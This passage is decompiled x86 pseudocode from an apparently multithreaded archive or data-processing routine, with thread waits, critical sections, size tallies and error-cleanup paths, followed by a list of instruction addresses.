																			E00408604(_t1186 - 0x7c);
																			 *(_t1186 - 4) = 8;
																			E00408604(_t1186 - 0xa4);
																			 *(_t1186 - 4) = 7;
																			L00442DE5(_t1186 - 0x90);
																			 *(_t1186 - 4) = 6;
																			L00442E79(_t1186 - 0xbc);
																			 *(_t1186 - 4) = 5;
																			L0044296D(_t1186 - 0xe4);
																			 *(_t1186 - 4) = 4;
																			L0044395A(_t1186 - 0x13c, __eflags);
																			 *(_t1186 - 4) = 3;
																			L0043361B(_t1186 - 0x28);
																			L147:
																			 *(_t1186 - 4) = 2;
																			L00443C57(_t1186 - 0x5c);
																			L148:
																			 *(_t1186 - 4) = 1;
																			E0043E0CB(_t1186 - 0x2ec);
																			 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
																			L00442D78(_t1186 - 0x3ac);
																			_t650 = _t1176;
																			goto L125;
																		}
																		__eflags =  *_t1160 - _t928;
																		if( *_t1160 == _t928) {
																			_t1146 =  *(_t1186 + 8);
																			_t700 = L00442EE9( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 8), _t1160, _t1186 - 0x294,  *((intOrPtr*)(_t1186 - 0x28)), _t1186 - 0x18);
																			__eflags = _t700 - _t928;
																			if(__eflags != 0) {
																				L145:
																				_t1176 = _t700;
																				goto L146;
																			}
																			L119:
																			_push(_t1186 - 0x294);
																			L00443C8F(_t1186 - 0x5c);
																			 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + 0x1a;
																			asm("adc [ebp-0x14], ebx");
																			E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																			_t494 = _t1186 - 0x38;
																			 *_t494 =  *(_t1186 - 0x38) + 1;
																			__eflags =  *_t494;
																			L120:
																			 *(_t1186 - 4) = 0xa;
																			_t985 = _t1186 - 0x294;
																			L121:
																			E0043CD47(_t985, __eflags);
																			goto L122;
																		}
																		L101:
																		__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																		if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																			_t790 = E00440593(_t1186 - 0x294);
																		} else {
																			_t790 =  *((intOrPtr*)(_t1160 + 2));
																		}
																		__eflags = _t790 - _t928;
																		if(_t790 == _t928) {
																			__eflags =  *(_t1186 - 0x2c) -  *(_t1186 - 0x38);
																			if( *(_t1186 - 0x2c) >=  *(_t1186 - 0x38)) {
																				_t1178 =  *(_t1186 + 0x14);
																			} else {
																				_t1178 =  *(_t1186 + 0x14);
																				 *(_t1186 - 0x2c) =  *(_t1186 - 0x38);
																				_t1146 = _t1178;
																				L00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				E0044072C( *((intOrPtr*)(_t1186 - 0x270)),  *((intOrPtr*)(_t1160 + 0x18)),  *((intOrPtr*)(_t1160 + 0x1c)),  *((intOrPtr*)(_t1178 + 0x54)));
																			}
																			_t793 =  *( *(_t1186 - 0x1c) +  *((intOrPtr*)(_t1186 - 0xac)));
																			 *(_t1186 - 0x68) = _t793;
																			__eflags =  *((intOrPtr*)(_t793 + 0x40)) - _t928;
																			if( *((intOrPtr*)(_t793 + 0x40)) == _t928) {
																				_t1179 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) +  *( *(_t1186 - 0x70)) * 4));
																				_t796 =  *((intOrPtr*)(_t1179 + 0x18));
																				__eflags =  *((intOrPtr*)(_t796 + 0x15)) - _t928;
																				if( *((intOrPtr*)(_t796 + 0x15)) == _t928) {
																					 *(_t1186 - 0x44) = _t928;
																					_push(_t1186 - 0x44);
																					 *(_t1186 - 4) = 0x1a;
																					E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																					L00442A14( *((intOrPtr*)(_t1179 + 0x18)),  *(_t1186 - 0x44));
																					 *((char*)( *((intOrPtr*)(_t1179 + 0x18)) + 0x15)) = 1;
																					L00467B10( *((intOrPtr*)(_t1179 + 0x18)) + 0x1c);
																					 *(_t1186 - 4) = 0x18;
																					L0043361B(_t1186 - 0x44);
																				}
																				_t797 = WaitForMultipleObjects( *(_t1186 - 0x9c),  *(_t1186 - 0x98), _t928, 0xffffffff);
																				 *(_t1186 - 0x1c) = _t797;
																				_t1180 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + ( *(_t1186 - 0x70))[_t797] * 4));
																				L00437D6C(_t1180 + 0x20);
																				_t700 =  *(_t1180 + 0x9c);
																				 *((char*)(_t1180 + 0xb8)) = 1;
																				__eflags = _t700 - _t928;
																				if(__eflags != 0) {
																					goto L145;
																				} else {
																					E00408784(_t1186 - 0x7c,  *(_t1186 - 0x1c), 1);
																					E00408784(_t1186 - 0xa4,  *(_t1186 - 0x1c), 1);
																					__eflags =  *(_t1186 - 0x1c) - _t928;
																					if(__eflags != 0) {
																						_t1165 =  *( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1180 + 0xbc) * 4);
																						 *(_t1186 - 0x1c) = _t1165;
																						L0040F015( *(_t1180 + 0x18), __eflags, _t1165);
																						_t996 = 6;
																						_t805 = memcpy(_t1165 + 0x28, _t1180 + 0xa0, _t996 << 2);
																						_t1189 = _t1189 + 0xc;
																						 *((char*)(_t805 + 0x40)) = 1;
																						goto L120;
																					}
																					_t700 = L0040F032( *(_t1180 + 0x18));
																					__eflags = _t700 - _t928;
																					if(__eflags != 0) {
																						goto L145;
																					}
																					 *(_t1186 - 0x1c) =  *(_t1180 + 0x18);
																					L00437D6C( *(_t1180 + 0x18) + 0x54);
																					L00437D6C( *(_t1186 - 0x1c) + 0x50);
																					_push(_t1186 - 0x294);
																					_push( *((intOrPtr*)( *(_t1186 + 0x14) + 0x55)));
																					L00442BEC(_t1180 + 0xa0,  *((intOrPtr*)( *(_t1186 + 0x14) + 0x54)));
																					_t1146 =  *(_t1186 + 0x14);
																					L00442B0A( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																					_push(_t1186 - 0x294);
																					E004408BF( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14));
																					goto L119;
																				}
																			} else {
																				 *(_t1186 - 0x1c) = _t928;
																				_push(_t1186 - 0x1c);
																				 *(_t1186 - 4) = 0x19;
																				E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																				L0040E94A( *(_t1186 - 0x68),  *((intOrPtr*)(_t1186 - 0xe0)),  *(_t1186 - 0x1c));
																				_push(_t1186 - 0x294);
																				_push( *((intOrPtr*)(_t1178 + 0x55)));
																				L00442BEC( *(_t1186 - 0x68) + 0x28,  *((intOrPtr*)(_t1178 + 0x54)));
																				_t1146 = _t1178;
																				L00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				_push(_t1186 - 0x294);
																				E004408BF( *((intOrPtr*)(_t1186 - 0x24)), _t1178);
																				L0040E933( *(_t1186 - 0x68), _t1160, _t1186 - 0xe4);
																				 *(_t1186 - 4) = 0x18;
																				L0043361B(_t1186 - 0x1c);
																				goto L119;
																			}
																		} else {
																			_t1146 =  *(_t1186 + 0x14);
																			L004431F3( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																			goto L119;
																		}
																	}
																	__eflags =  *_t1160 - _t928;
																	if( *_t1160 != _t928) {
																		goto L101;
																	}
																	goto L99;
																}
																 *(_t1186 - 0x38) =  *(_t1186 - 0x38) + 1;
																goto L122;
															}
															__eflags =  *(_t1186 - 0x40) - _t669;
															if( *(_t1186 - 0x40) >= _t669) {
																goto L95;
															}
															 *(_t1186 - 0x40) =  *(_t1186 - 0x40) + 1;
															_t1177 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + ( *(_t1186 - 0x40) << 2)));
															__eflags =  *_t1177 - _t928;
															if(__eflags == 0) {
																goto L122;
															}
															L0043F39F(_t1186 - 0x1d4, __eflags);
															__eflags =  *((intOrPtr*)(_t1177 + 1)) - _t928;
															 *(_t1186 - 4) = 0x12;
															if( *((intOrPtr*)(_t1177 + 1)) == _t928) {
																_t1161 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1177 + 8) * 4));
																L00443797(_t1186 - 0x1d4, _t1161);
																 *((intOrPtr*)(_t1186 - 0x144)) =  *((intOrPtr*)(_t1161 + 0x90));
																 *(_t1186 - 0x140) =  *((intOrPtr*)(_t1161 + 0x94));
																_push(_t1186 - 0x1d4);
																__eflags = L0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																if(__eflags != 0) {
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	L00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	L00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	L0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	L0044395A(_t1186 - 0x13c, __eflags);
																	_t723 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t723 - _t928;
																	if(_t723 != _t928) {
																		 *((intOrPtr*)( *_t723 + 8))(_t723);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x13;
																	E0040862D();
																	 *(_t1186 - 4) = 2;
																	E00408604(_t1186 - 0x5c);
																	_t1176 = 0x80004001;
																	goto L148;
																}
																__eflags = E00440593(_t1186 - 0x1d4);
																if(__eflags != 0) {
																	L94:
																	 *(_t1186 - 4) = 0xa;
																	_t985 = _t1186 - 0x1d4;
																	goto L121;
																}
																L81:
																 *(_t1186 - 0x34) = _t928;
																_t1163 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)) + 0x3c;
																 *(_t1186 - 0x68) = _t1163;
																EnterCriticalSection(_t1163);
																_t729 =  *((intOrPtr*)(_t1186 + 0x1c));
																_t1146 = _t1186 - 0x34;
																 *(_t1186 - 4) = 0x15;
																_t730 =  *((intOrPtr*)( *_t729 + 0x1c))(_t729,  *((intOrPtr*)(_t1177 + 0xc)), _t1186 - 0x34);
																__eflags = _t730 - 1;
																 *(_t1186 - 0x1c) = _t730;
																if(_t730 != 1) {
																	_t1176 =  *(_t1186 - 0x1c);
																	__eflags = _t1176 - _t928;
																	if(_t1176 != _t928) {
																		LeaveCriticalSection(_t1163);
																		_t731 =  *(_t1186 - 0x34);
																		 *(_t1186 - 4) = 0x12;
																		__eflags = _t731 - _t928;
																		if(__eflags != 0) {
																			 *((intOrPtr*)( *_t731 + 8))(_t731);
																		}
																		 *(_t1186 - 4) = 0xa;
																		E0043CD47(_t1186 - 0x1d4, __eflags);
																		 *(_t1186 - 4) = 9;
																		E00408604(_t1186 - 0x7c);
																		 *(_t1186 - 4) = 8;
																		E00408604(_t1186 - 0xa4);
																		 *(_t1186 - 4) = 7;
																		L00442DE5(_t1186 - 0x90);
																		 *(_t1186 - 4) = 6;
																		L00442E79(_t1186 - 0xbc);
																		 *(_t1186 - 4) = 5;
																		L0044296D(_t1186 - 0xe4);
																		 *(_t1186 - 4) = 4;
																		L0044395A(_t1186 - 0x13c, __eflags);
																		_t739 =  *((intOrPtr*)(_t1186 - 0x28));
																		 *(_t1186 - 4) = 3;
																		__eflags = _t739 - _t928;
																		if(_t739 != _t928) {
																			 *((intOrPtr*)( *_t739 + 8))(_t739);
																		}
																		 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																		 *(_t1186 - 4) = 0x17;
																		L134:
																		E0040862D();
																		 *(_t1186 - 4) = 2;
																		E00408604(_t1186 - 0x5c);
																		goto L148;
																	}
																	_t744 =  *((intOrPtr*)(_t1186 + 0x1c));
																	_t1176 =  *((intOrPtr*)( *_t744 + 0x20))(_t744, _t928);
																	__eflags = _t1176 - _t928;
																	if(_t1176 != _t928) {
																		LeaveCriticalSection(_t1163);
																		_t746 =  *(_t1186 - 0x34);
																		 *(_t1186 - 4) = 0x12;
																		__eflags = _t746 - _t928;
																		if(__eflags != 0) {
																			 *((intOrPtr*)( *_t746 + 8))(_t746);
																		}
																		 *(_t1186 - 4) = 0xa;
																		E0043CD47(_t1186 - 0x1d4, __eflags);
																		 *(_t1186 - 4) = 9;
																		E00408604(_t1186 - 0x7c);
																		 *(_t1186 - 4) = 8;
																		E00408604(_t1186 - 0xa4);
																		 *(_t1186 - 4) = 7;
																		L00442DE5(_t1186 - 0x90);
																		 *(_t1186 - 4) = 6;
																		L00442E79(_t1186 - 0xbc);
																		 *(_t1186 - 4) = 5;
																		L0044296D(_t1186 - 0xe4);
																		 *(_t1186 - 4) = 4;
																		L0044395A(_t1186 - 0x13c, __eflags);
																		_t754 =  *((intOrPtr*)(_t1186 - 0x28));
																		 *(_t1186 - 4) = 3;
																		__eflags = _t754 - _t928;
																		if(_t754 != _t928) {
																			 *((intOrPtr*)( *_t754 + 8))(_t754);
																		}
																		goto L147;
																	}
																	 *(_t1186 - 4) = 0x14;
																	LeaveCriticalSection(_t1163);
																	_t1164 = 0;
																	__eflags =  *(_t1186 - 0x20) - _t928;
																	if( *(_t1186 - 0x20) <= _t928) {
																		L93:
																		 *(_t1186 - 4) = 0x12;
																		L0043361B(_t1186 - 0x34);
																		goto L94;
																	}
																	_t758 =  *((intOrPtr*)(_t1186 - 0x84));
																	while(1) {
																		_t1182 =  *_t758;
																		__eflags =  *(_t1182 + 0xb8) - _t928;
																		if( *(_t1182 + 0xb8) != _t928) {
																			break;
																		}
																		_t1164 = _t1164 + 1;
																		_t758 = _t758 + 4;
																		__eflags = _t1164 -  *(_t1186 - 0x20);
																		if(_t1164 <  *(_t1186 - 0x20)) {
																			continue;
																		}
																		goto L93;
																	}
																	 *(_t1182 + 0xb8) = _t928;
																	_t341 = _t1182 + 0x20; // 0x20
																	E0040C9B4(_t341,  *(_t1186 - 0x34));
																	L00437D6C(_t1186 - 0x34);
																	L0040EFF1( *((intOrPtr*)(_t1182 + 0x18)));
																	L0040F2EB( *((intOrPtr*)( *((intOrPtr*)(_t1182 + 0x10)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t1182 + 0x10)) + 0xc)));
																	_t347 = _t1182 + 4; // 0x4
																	L00467B10(_t347);
																	_t766 =  *(_t1186 - 0x40) - 1;
																	__eflags = _t766;
																	 *(_t1182 + 0xbc) = _t766;
																	E00415C6D(_t1186 - 0xa4,  *((intOrPtr*)(_t1182 + 8)));
																	E00415C6D(_t1186 - 0x7c, _t1164);
																	goto L93;
																}
																asm("adc ecx, ebx");
																 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t1177 + 0x18)) + 0x1a;
																asm("adc [ebp-0x14], ecx");
																E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																_t773 =  *((intOrPtr*)(_t1186 + 0x1c));
																_t1176 =  *((intOrPtr*)( *_t773 + 0x20))(_t773, _t928);
																__eflags = _t1176 - _t928;
																if(_t1176 != _t928) {
																	LeaveCriticalSection(_t1163);
																	_t775 =  *(_t1186 - 0x34);
																	 *(_t1186 - 4) = 0x12;
																	__eflags = _t775 - _t928;
																	if(__eflags != 0) {
																		 *((intOrPtr*)( *_t775 + 8))(_t775);
																	}
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	L00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	L00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	L0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	L0044395A(_t1186 - 0x13c, __eflags);
																	_t783 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t783 - _t928;
																	if(_t783 != _t928) {
																		 *((intOrPtr*)( *_t783 + 8))(_t783);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x16;
																	goto L134;
																}
																 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1186 - 0x40) * 4 - 4)) + 0x41)) = 1;
																LeaveCriticalSection(_t1163);
																_t788 =  *(_t1186 - 0x34);
																 *(_t1186 - 4) = 0x12;
																__eflags = _t788 - _t928;
																if(__eflags != 0) {
																	 *((intOrPtr*)( *_t788 + 8))(_t788);
																}
																goto L94;
															}
															__eflags =  *((intOrPtr*)(_t1177 + 2)) - _t928;
															if(__eflags == 0) {
																goto L81;
															}
															goto L94;
															L122:
															_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
															__eflags =  *(_t1186 - 0x38) - _t669;
														} while ( *(_t1186 - 0x38) < _t669);
														goto L123;
													} else {
														goto L53;
													}
													while(1) {
														L53:
														_t1183 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + _t1159 * 4));
														_t845 = L00442D4F(_t1183);
														__eflags = _t845 - _t928;
														 *(_t1186 - 0x2c) = _t845;
														if(_t845 != _t928) {
															break;
														}
														_push(0x58);
														_t856 = L004079F2();
														 *(_t1186 - 0x2c) = _t856;
														__eflags = _t856 - _t928;
														 *(_t1186 - 4) = 0xf;
														if(_t856 == _t928) {
															_t857 = 0;
															__eflags = 0;
														} else {
															_t857 = L00442A33(_t856, _t1186 - 0xe4);
														}
														 *(_t1186 - 4) = 0xa;
														 *((intOrPtr*)(_t1183 + 0x18)) = _t857;
														_t858 = L004429EB(_t857);
														__eflags = _t858 - _t928;
														 *(_t1186 - 0x2c) = _t858;
														if(_t858 != _t928) {
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															L00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															L00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															L0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															L0044395A(_t1186 - 0x13c, __eflags);
															_t865 =  *((intOrPtr*)(_t1186 - 0x28));
															 *(_t1186 - 4) = 3;
															__eflags = _t865 - _t928;
															if(_t865 != _t928) {
																 *((intOrPtr*)( *_t865 + 8))(_t865);
															}
															 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
															 *(_t1186 - 4) = 0x10;
															E0040862D();
															 *(_t1186 - 4) = 2;
															E00408604(_t1186 - 0x5c);
															_t928 =  *(_t1186 - 0x2c);
															goto L124;
														} else {
															E0040C9B4(_t1183 + 0x1c,  *((intOrPtr*)(_t1183 + 0x18)));
															 *((char*)(_t1183 + 0xb8)) = 1;
															_push(0x10);
															_t870 = L004079F2();
															__eflags = _t870 - _t928;
															if(_t870 == _t928) {
																_t870 = 0;
																__eflags = 0;
															} else {
																 *(_t870 + 4) = _t928;
																 *_t870 = 0x47b88c;
															}
															 *((intOrPtr*)(_t1183 + 0x10)) = _t870;
															E0040C9B4(_t1183 + 0x14, _t870);
															_t872 =  *((intOrPtr*)(_t1183 + 0x10));
															_t1146 = 0x442dd7;
															 *((intOrPtr*)(_t872 + 8)) = _t1186 - 0x13c;
															 *(_t872 + 0xc) = _t1159;
															_t1173 = E00467AD0(_t1183, 0x442dd7, _t1183);
															__eflags = _t1173 - _t928;
															if(_t1173 != _t928) {
																 *(_t1186 - 4) = 9;
																E00408604(_t1186 - 0x7c);
																 *(_t1186 - 4) = 8;
																E00408604(_t1186 - 0xa4);
																 *(_t1186 - 4) = 7;
																L00442DE5(_t1186 - 0x90);
																 *(_t1186 - 4) = 6;
																L00442E79(_t1186 - 0xbc);
																 *(_t1186 - 4) = 5;
																L0044296D(_t1186 - 0xe4);
																 *(_t1186 - 4) = 4;
																L0044395A(_t1186 - 0x13c, __eflags);
																_t880 =  *((intOrPtr*)(_t1186 - 0x28));
																 *(_t1186 - 4) = 3;
																__eflags = _t880 - _t928;
																if(_t880 != _t928) {
																	 *((intOrPtr*)( *_t880 + 8))(_t880);
																}
																 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																 *(_t1186 - 4) = 0x11;
																goto L47;
															} else {
																_t1159 = _t1159 + 1;
																__eflags = _t1159 -  *(_t1186 - 0x20);
																if(_t1159 <  *(_t1186 - 0x20)) {
																	continue;
																}
																goto L63;
															}
														}
													}
													 *(_t1186 - 4) = 9;
													E00408604(_t1186 - 0x7c);
													 *(_t1186 - 4) = 8;
													E00408604(_t1186 - 0xa4);
													 *(_t1186 - 4) = 7;
													L00442DE5(_t1186 - 0x90);
													 *(_t1186 - 4) = 6;
													L00442E79(_t1186 - 0xbc);
													 *(_t1186 - 4) = 5;
													L0044296D(_t1186 - 0xe4);
													 *(_t1186 - 4) = 4;
													L0044395A(_t1186 - 0x13c, __eflags);
													_t852 =  *((intOrPtr*)(_t1186 - 0x28));
													 *(_t1186 - 4) = 3;
													__eflags = _t852 - _t928;
													if(_t852 != _t928) {
														 *((intOrPtr*)( *_t852 + 8))(_t852);
													}
													 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
													 *(_t1186 - 4) = 0xe;
													E0040862D();
													 *(_t1186 - 4) = 2;
													E00408604(_t1186 - 0x5c);
													_t928 =  *(_t1186 - 0x2c);
													goto L124;
												} else {
													goto L51;
												}
												do {
													L51:
													_push(_t1186 - 0x2ec);
													_push(L00442CFF(_t1186 - 0x1fc));
													 *(_t1186 - 4) = 0xd;
													L00443AB1(_t1186 - 0x90);
													 *(_t1186 - 4) = 0xa;
													L004439AD(_t1186 - 0x1fc);
													_t1175 = _t1175 - 1;
													__eflags = _t1175;
												} while (_t1175 != 0);
												goto L52;
											} else {
												goto L49;
											}
											do {
												L49:
												L004429C6(_t1186 - 0x334);
												 *(_t1186 - 0x2f4) = _t928;
												 *(_t1186 - 0x2f3) = _t928;
												_push(_t1186 - 0x334);
												 *(_t1186 - 4) = 0xc;
												L00443BAF(_t1186 - 0xb8);
												 *(_t1186 - 4) = 0xa;
												E00408604(_t1186 - 0x334);
												_t1158 = _t1158 + 1;
												__eflags = _t1158 -  *((intOrPtr*)(_t1174 + 8));
											} while (_t1158 <  *((intOrPtr*)(_t1174 + 8)));
											goto L50;
										} else {
											 *(_t1186 - 4) = 9;
											E00408604(_t1186 - 0x7c);
											 *(_t1186 - 4) = 8;
											E00408604(_t1186 - 0xa4);
											 *(_t1186 - 4) = 7;
											L00442DE5(_t1186 - 0x90);
											 *(_t1186 - 4) = 6;
											L00442E79(_t1186 - 0xbc);
											 *(_t1186 - 4) = 5;
											L0044296D(_t1186 - 0xe4);
											 *(_t1186 - 4) = 4;
											L0044395A(_t1186 - 0x13c, __eflags);
											_t898 =  *((intOrPtr*)(_t1186 - 0x28));
											 *(_t1186 - 4) = 3;
											__eflags = _t898 - _t928;
											if(_t898 != _t928) {
												 *((intOrPtr*)( *_t898 + 8))(_t898);
											}
											 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
											 *(_t1186 - 4) = 0xb;
											L47:
											E0040862D();
											 *(_t1186 - 4) = 2;
											E00408604(_t1186 - 0x5c);
											_t928 = _t1173;
											L124:
											 *(_t1186 - 4) = 1;
											E0043E0CB(_t1186 - 0x2ec);
											 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
											L00442D78(_t1186 - 0x3ac);
											_t650 = _t928;
											L125:
											 *[fs:0x0] =  *((intOrPtr*)(_t1186 - 0xc));
											return _t650;
										}
									}
									goto L37;
								}
								_t904 = L0046B300( *((intOrPtr*)(_t1186 - 0x48)),  *(_t1186 - 0x44),  *((intOrPtr*)(_t1186 - 0x30)),  *(_t1186 - 0x2c));
								_t1134 =  *(_t1170 + 0x34);
								if( *(_t1170 + 0x34) == _t928) {
									_t1134 = _t1155;
								}
								_t905 = L0046B300(_t904, _t1146, _t1134, _t928);
								_t1205 = _t1146 - _t928;
								_t1135 = 0x20;
								if(_t1205 > 0 || _t1205 >= 0 && _t905 >= _t1135) {
									_t1155 = 1;
								} else {
									_t1135 = _t905;
									_t1155 = 1;
									if(_t905 < _t1155) {
										_t1135 = _t1155;
									}
								}
								_t906 =  *(_t1186 - 0x20);
								_t907 = _t906 / _t1135;
								_t1146 = _t906 % _t1135;
								 *(_t1186 - 0x2ac) = _t1135;
								 *(_t1186 - 0x20) = _t907;
								if(_t907 > _t1155) {
									goto L36;
								} else {
									 *(_t1186 - 0xd) = _t928;
									goto L33;
								}
							}
							if( *((intOrPtr*)(_t1170 + 0x44)) != _t928) {
								goto L36;
							}
							 *(_t1186 - 0xd) = _t928;
							goto L21;
						}
					}
					L004438A5(_t1186 - 0x2ec, _t1170);
					 *(_t1186 - 0xd) = 1;
					if( *(_t1186 - 0x20) > _t1155) {
						goto L13;
					}
					goto L12;
				} else {
					goto L1;
				}
				do {
					L1:
					_t911 =  *((intOrPtr*)( *((intOrPtr*)(_t931 + 0xc)) + _t1154 * 4));
					if( *_t911 == _t928) {
						_t1184 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t911 + 8) * 4));
						_push(_t1184);
						E0043CBF4(_t1186 - 0x1d4, __eflags);
						 *((intOrPtr*)(_t1186 - 0x144)) =  *((intOrPtr*)(_t1184 + 0x90));
						 *(_t1186 - 0x140) =  *((intOrPtr*)(_t1184 + 0x94));
						_push(_t1186 - 0x1d4);
						 *(_t1186 - 4) = _t928;
						__eflags = L0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
						if(__eflags != 0) {
							 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
							E0043CD47(_t1186 - 0x1d4, __eflags);
							_t650 = 0x80004001;
							goto L125;
						} else {
							_t1146 = ( *(_t1186 - 0x140) & 0x0000ffff) +  *((intOrPtr*)(_t1186 - 0x144));
							asm("adc ecx, esi");
							asm("adc ecx, [ebp-0x1c0]");
							 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + (( *(_t1186 - 0x1d2) >> 0x00000003 & 0x00000001) << 4) + _t1146 +  *((intOrPtr*)(_t1186 - 0x1c4));
							asm("adc [ebp-0x14], ecx");
							_t43 = _t1186 - 4;
							 *_t43 =  *(_t1186 - 4) | 0xffffffff;
							__eflags =  *_t43;
							E0043CD47(_t1186 - 0x1d4, __eflags);
							goto L5;
						}
					} else {
						_t1146 =  *(_t911 + 0x1c);
						 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t911 + 0x18));
						asm("adc [ebp-0x14], edx");
						 *((intOrPtr*)(_t1186 - 0x48)) =  *((intOrPtr*)(_t1186 - 0x48)) +  *((intOrPtr*)(_t911 + 0x18));
						asm("adc [ebp-0x44], eax");
						 *((intOrPtr*)(_t1186 - 0x30)) =  *((intOrPtr*)(_t1186 - 0x30)) + 1;
						asm("adc [ebp-0x2c], ebx");
					}
					L5:
					 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + 0x44;
					_t931 =  *((intOrPtr*)(_t1186 + 0x10));
					asm("adc [ebp-0x14], ebx");
					_t1154 = _t1154 + 1;
				} while (_t1154 <  *((intOrPtr*)(_t931 + 8)));
				goto L6;
			}



















































































                                                                                  0x00441925
                                                                                  0x0044192a
                                                                                  0x0044192f
                                                                                  0x00441935
                                                                                  0x00441939
                                                                                  0x0044193e
                                                                                  0x00441943
                                                                                  0x00441947
                                                                                  0x0044194a
                                                                                  0x0044194d
                                                                                  0x00441950
                                                                                  0x00441953
                                                                                  0x00441956
                                                                                  0x00441959
                                                                                  0x0044195c
                                                                                  0x00441a35
                                                                                  0x00441a35
                                                                                  0x00441a38
                                                                                  0x00441a3a
                                                                                  0x00441a3f
                                                                                  0x00441a42
                                                                                  0x00441a42
                                                                                  0x00441a47
                                                                                  0x00441a4a
                                                                                  0x00441a4b
                                                                                  0x00441a50
                                                                                  0x00441a5a
                                                                                  0x00441a5d
                                                                                  0x00441a67
                                                                                  0x00441a6c
                                                                                  0x00441a76
                                                                                  0x00441a79
                                                                                  0x00441a7c
                                                                                  0x00441a7f
                                                                                  0x00441a82
                                                                                  0x00441a84
                                                                                  0x00441a84
                                                                                  0x00441a8d
                                                                                  0x00441a94
                                                                                  0x00441a98
                                                                                  0x00441aaf
                                                                                  0x00441aaf
                                                                                  0x00441ab2
                                                                                  0x00441ab2
                                                                                  0x00441ab5
                                                                                  0x00441abe
                                                                                  0x00441abe
                                                                                  0x00441ac4
                                                                                  0x00441b81
                                                                                  0x00441b81
                                                                                  0x00441b8a
                                                                                  0x00441b8d
                                                                                  0x00441b8e
                                                                                  0x00441b91
                                                                                  0x00441b94
                                                                                  0x00441b9c
                                                                                  0x00000000
                                                                                  0x00441aca
                                                                                  0x00441acd
                                                                                  0x00441ad1
                                                                                  0x00441ad4
                                                                                  0x00441ae2
                                                                                  0x00441ae4
                                                                                  0x00441b56
                                                                                  0x00441b5a
                                                                                  0x00441b5c
                                                                                  0x00441b67
                                                                                  0x00441b6a
                                                                                  0x00441b6a
                                                                                  0x00441b6c
                                                                                  0x00441b74
                                                                                  0x00441b77
                                                                                  0x00441b79
